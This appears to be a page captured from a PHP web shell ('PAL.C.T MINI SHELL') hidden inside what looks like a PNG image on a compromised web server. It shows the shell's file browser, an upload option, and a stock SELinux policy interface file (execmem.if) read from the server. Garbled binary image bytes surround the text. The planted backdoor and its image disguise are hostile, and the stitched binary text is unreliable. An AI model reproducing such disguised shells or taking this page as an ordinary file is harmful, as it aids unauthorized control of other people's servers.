php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/Rm19_symconf/root/usr/share/selinux/devel/include/apps/
upload
files >> /var/www/html/sub/images/Rm19_symconf/root/usr/share/selinux/devel/include/apps/execmem.if

## <summary>execmem domain</summary>

########################################
## <summary>
##	Execute the execmem program in the execmem domain.
## </summary>
## <param name="domain">
##	<summary>
##	Domain allowed access.
##	</summary>
## </param>
#
interface(`execmem_exec',`
	gen_require(`
		type execmem_exec_t;
	')

	can_exec($1, execmem_exec_t)
')

#######################################
## <summary>
##	The role template for the execmem module.
## </summary>
## <desc>
##	<p>
##	This template creates a derived domains which are used
##	for execmem applications.
##	</p>
## </desc>
## <param name="role_prefix">
##	<summary>
##	The prefix of the user domain (e.g., user
##	is the prefix for user_t).
##	</summary>
## </param>
## <param name="user_role">
##	<summary>
##	The role associated with the user domain.
##	</summary>
## </param>
## <param name="user_domain">
##	<summary>
##	The type of the user domain.
##	</summary>
## </param>
#
template(`execmem_role_template',`
	gen_require(`
		type execmem_exec_t;
	')

	type $1_execmem_t;
	domain_type($1_execmem_t)
	domain_entry_file($1_execmem_t, execmem_exec_t)
	role $2 types $1_execmem_t;

	userdom_unpriv_usertype($1, $1_execmem_t)
	userdom_manage_tmp_role($2, $1_execmem_t)
	userdom_manage_tmpfs_role($2, $1_execmem_t)

	allow $1_execmem_t self:process { execmem execstack };
	allow $3 $1_execmem_t:process { getattr ptrace noatsecure signal_perms };
	domtrans_pattern($3, execmem_exec_t, $1_execmem_t)
ifdef(`hide_broken_symptoms', `
	dontaudit $1_execmem_t $3:socket_class_set { read write };
')
	files_execmod_tmp($1_execmem_t)

	allow $3 execmem_exec_t:file execmod;
	allow $1_execmem_t execmem_exec_t:file execmod;

	optional_policy(`
		chrome_role($2, $1_execmem_t)
	')

	optional_policy(`
		mozilla_execmod_user_home_files($1_execmem_t)
	')

	optional_policy(`
		nsplugin_rw_shm($1_execmem_t)
		nsplugin_rw_semaphores($1_execmem_t)
	')

	optional_policy(`
		xserver_role($2, $1_execmem_t)
	')
')

########################################
## <summary>
##	Execute a execmem_exec file
##	in the specified domain.
## </summary>
## <param name="domain">
##	<summary>
##	Domain allowed access.
##	</summary>
## </param>
## <param name="target_domain">
##	<summary>
##	The type of the new process.
##	</summary>
## </param>
#
interface(`execmem_domtrans',`
	gen_require(`
		type execmem_exec_t;
	')

	domtrans_pattern($1, execmem_exec_t, $2)
')

#######################################
## <summary>
##  Execmod the execmem_exec applications
## </summary>
## <param name="domain">
##  <summary>
##  Domain allowed access.
##  </summary>
## </param>
#
interface(`execmem_execmod',`
    gen_require(`
        type execmem_exec_t;
    ')

    allow $1 execmem_exec_t:file execmod;
')
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`